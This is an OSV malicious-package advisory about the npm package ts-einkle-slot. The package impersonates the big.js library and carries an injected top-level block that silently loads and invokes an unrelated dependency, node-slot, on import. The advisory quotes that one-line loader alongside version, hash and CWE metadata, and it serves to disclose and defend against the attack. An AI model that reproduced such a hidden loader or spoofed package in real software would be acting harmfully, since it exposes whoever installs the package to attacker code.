MAL-2026-6525
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-einkle-slot/MAL-2026-6525.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6525
- Published
- 2026-06-26T14:15:58Z
- Modified
- 2026-06-27T19:46:39.237574074Z
- Summary
- Malicious code in ts-einkle-slot (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)
Package is published as
ts-einkle-slotbut its tarball contents (source, README, LICENCE, package.json author/repository/description) are copied verbatim from Michael Mclaughlin's legitimatebig.jspackage, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (big.jsandbig.mjs, referenced frommain/module/exports) contain an injected top-level block:try { const doc = require('node-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}. This causes the transitive dependencynode-slot(pulled in via the declaredts-einkledependency) to be loaded and itsfrom_str()invoked the moment any consumerrequires orimports this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelatednode-slotruntime module on import. Installer harm is delivered by the attacker-controlled transitivenode-slot, which is pulled into the install tree solely by virtue of installing this package. - Database specific
{ "malicious-packages-origins": [ { "versions": [ "0.0.8" ], "modified_time": "2026-06-26T14:15:58Z", "sha256": "f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b", "id": "IN-MAL-2026-007605", "source": "amazon-inspector", "import_time": "2026-06-26T14:59:21.307992564Z" }, { "versions": [ "0.1.0" ], "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" } ] } ], "modified_time": "2026-06-27T15:46:43Z", "sha256": "410ddc78002637af895c433fbefd95d70bfaa2b35f761e51bf4ea77e1a0aec65", "id": "IN-MAL-2026-007683", "source": "amazon-inspector", "import_time": "2026-06-27T15:57:49.062065643Z" }, { "versions": [ "0.0.9" ], "source": "amazon-inspector", "modified_time": "2026-06-27T15:46:35Z", "sha256": "ebcd03f4867c803e5fe72f1bd4005bd51a3b441ba6bbc8ebec1a72af5dfa083e", "id": "IN-MAL-2026-007682", "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" } ] } ], "import_time": "2026-06-27T15:57:48.996183141Z" }, { "versions": [ "0.1.1" ], "source": "amazon-inspector", "modified_time": "2026-06-27T19:13:34Z", "sha256": "5811ddfd53f327bf98d44c5903c7ddb009a05689cd172688e5bd5cbbaaf62eb2", "id": "IN-MAL-2026-007687", "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" } ] } ], "import_time": "2026-06-27T19:35:56.0374892Z" }, { "versions": [ "0.1.2" ], "source": "amazon-inspector", "modified_time": "2026-06-27T19:13:22Z", "sha256": "90d45cca3c7e05f5c9af46b98cec23a8d0971fdb9c83c5f120d0ca4767bda0b9", "id": "IN-MAL-2026-007686", "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" } ] } ], "import_time": "2026-06-27T19:35:55.909734348Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / ts-einkle-slot
Package
- Name
- ts-einkle-slot
- View open source insights on deps.dev
- Purl
- pkg:npm/ts-einkle-slot
Affected ranges
- Type
- SEMVER
- Events
-
Introduced0Unknown introduced version / All previous versions are affected
Database specific
cwes
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
indicators
{
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-Nc2yiowLUS+K5fgbw5I+243QO2DPvOmwWUM6isWsw1+x30muc1zP5mAWS+aKFJfEP+uhzXGb3kMwQF+thUU+xQ==",
"sha1": "a6e7d2ef2de53501dea40b179e73a4af7d1df286"
},
"filename": "ts-einkle-slot-0.0.8.tgz"
}
],
"evidence_files": [
{
"path": "big.js",
"tlsh": "c6c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc",
"sha256": "442c54a9b0beff03159cb7dd3a59ad1c09dbe09f0bcec91df0a33a032a2e4f99"
},
{
"path": "big.mjs",
"tlsh": "5ec2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc",
"sha256": "37d3f81086dd78148676abfcd8858197a146ff8d91f1ca2d10f62159a32640d2"
},
{
"path": "package.json",
"tlsh": "ea210463c9e19da70af85ba47cac43a9f1161b1f40a04c5bb07b131c5f3345b2095b7d",
"sha256": "74c66314db3fc39413c66b3abd50304d7969e1715c6dfabf799ab0fe938e62e0"
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-einkle-slot/MAL-2026-6525.json"